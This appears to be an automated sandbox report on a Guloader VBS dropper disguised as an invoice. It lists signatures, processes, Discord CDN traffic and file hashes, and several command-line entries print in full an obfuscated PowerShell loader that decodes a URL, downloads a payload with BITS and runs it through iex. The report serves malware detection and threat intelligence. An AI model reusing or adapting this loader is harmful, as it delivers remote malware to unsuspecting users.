Analysis Overview
SHA256
d327a71665c7df97c34a5246c79c5ce6a4deccf5e470e048e6ef6c978bb9128a
Threat Level: Known bad
The file INVOICE2023310643_Packing_List__CMR.vbs.malz was found to be: Known bad.
Malicious Activity Summary
Guloader, Cloudeye
Blocklisted process makes network request
Checks QEMU agent file
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-07 18:47
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-07 18:47
Reported
2023-08-07 18:50
Platform
win7-20230712-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INVOICE2023310643_Packing_List__CMR.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 
'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 
'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab6E11.tmp
| MD5 | 3ac860860707baaf32469fa7cc7c0192 |
| SHA1 | c33c2acdaba0e6fa41fd2f00f186804722477639 |
| SHA256 | d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904 |
| SHA512 | d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c |
memory/3004-74-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
memory/3004-75-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/3004-76-0x000000001B330000-0x000000001B612000-memory.dmp
memory/3004-78-0x0000000001FB0000-0x0000000001FB8000-memory.dmp
memory/3004-77-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/3004-79-0x0000000002670000-0x00000000026F0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5X0NTGQAB7G2ZI4JOQHC.temp
| MD5 | 160a4e3770db46a442e4bce168a5bb76 |
| SHA1 | d45614566e57c35168415c6979ac057f62d8fea8 |
| SHA256 | 75c7f73447027465482349e5343959720f934215bbe74796650284611e34c32d |
| SHA512 | a1f73ed435910a8d14e53c15b76f8c3117733a18caf670d17e4bede635530e5545b346ed53801dcf14777e05b9f13849a5ca750892cd85f3dd43c7d5e18c1930 |
memory/2264-82-0x00000000738B0000-0x0000000073E5B000-memory.dmp
memory/2264-85-0x00000000027E0000-0x0000000002820000-memory.dmp
memory/2264-84-0x00000000027E0000-0x0000000002820000-memory.dmp
memory/2264-83-0x00000000738B0000-0x0000000073E5B000-memory.dmp
memory/3004-86-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
memory/3004-87-0x0000000002670000-0x00000000026F0000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a6a9df95dca8497bc5ed1a0f159c6b9d |
| SHA1 | 8f3cf11fbe4f2f5cabaa115b8eeefb0e6f93c63e |
| SHA256 | 410dd1f40fd5c2b157687fd53feed90bcb2758acae145fc453b8be644968ec40 |
| SHA512 | 3b569e507196da6742046ec12a82f013632c755167e7f693ef6b87d666d5a6048a052e58f098d07f71c7081a0f8d398f260e5e094d1d5aae1adebc9cd5449466 |
C:\Users\Admin\AppData\Local\Temp\Tar72E0.tmp
| MD5 | 4ff65ad929cd9a367680e0e5b1c08166 |
| SHA1 | c0af0d4396bd1f15c45f39d3b849ba444233b3a2 |
| SHA256 | c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6 |
| SHA512 | f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27 |
memory/3004-98-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
memory/3004-99-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/3004-100-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/2264-101-0x00000000738B0000-0x0000000073E5B000-memory.dmp
memory/2264-102-0x00000000027E0000-0x0000000002820000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-08-07 18:47
Reported
2023-08-07 18:50
Platform
win10v2004-20230703-en
Max time kernel
139s
Max time network
155s
Command Line
Signatures
Guloader, Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks QEMU agent file
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4404 wrote to memory of 2364 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4404 wrote to memory of 2364 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 4728 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 4728 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 4728 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INVOICE2023310643_Packing_List__CMR.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 
'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 
'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4728 -ip 4728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1724
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.13.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
Files
memory/2364-137-0x00000181341E0000-0x0000018134202000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nwzssja3.hyf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2364-147-0x00007FFEF3190000-0x00007FFEF3C51000-memory.dmp
memory/2364-148-0x0000018134160000-0x0000018134170000-memory.dmp
memory/2364-149-0x0000018134160000-0x0000018134170000-memory.dmp
memory/4728-151-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4728-150-0x0000000002460000-0x0000000002496000-memory.dmp
memory/4728-152-0x0000000004B00000-0x0000000004B10000-memory.dmp
memory/4728-153-0x0000000005140000-0x0000000005768000-memory.dmp
memory/4728-154-0x0000000004EB0000-0x0000000004ED2000-memory.dmp
memory/4728-155-0x0000000004F50000-0x0000000004FB6000-memory.dmp
memory/4728-161-0x0000000005770000-0x00000000057D6000-memory.dmp
memory/4728-166-0x0000000005DB0000-0x0000000005DCE000-memory.dmp
memory/2364-167-0x00007FFEF3190000-0x00007FFEF3C51000-memory.dmp
memory/2364-168-0x0000018134160000-0x0000018134170000-memory.dmp
memory/4728-169-0x0000000007620000-0x0000000007C9A000-memory.dmp
memory/4728-170-0x0000000006350000-0x000000000636A000-memory.dmp
memory/4728-171-0x0000000007050000-0x00000000070E6000-memory.dmp
memory/4728-172-0x00000000063C0000-0x00000000063E2000-memory.dmp
memory/4728-173-0x0000000008250000-0x00000000087F4000-memory.dmp
memory/4728-174-0x00000000073F0000-0x0000000007404000-memory.dmp
memory/4728-175-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4728-176-0x0000000004B00000-0x0000000004B10000-memory.dmp
memory/4728-178-0x0000000007430000-0x0000000007431000-memory.dmp
memory/4728-179-0x0000000008800000-0x000000000B34A000-memory.dmp
memory/4728-180-0x0000000008800000-0x000000000B34A000-memory.dmp
memory/4728-181-0x0000000077B61000-0x0000000077C81000-memory.dmp
memory/4728-182-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4728-183-0x0000000008800000-0x000000000B34A000-memory.dmp
memory/2364-186-0x00007FFEF3190000-0x00007FFEF3C51000-memory.dmp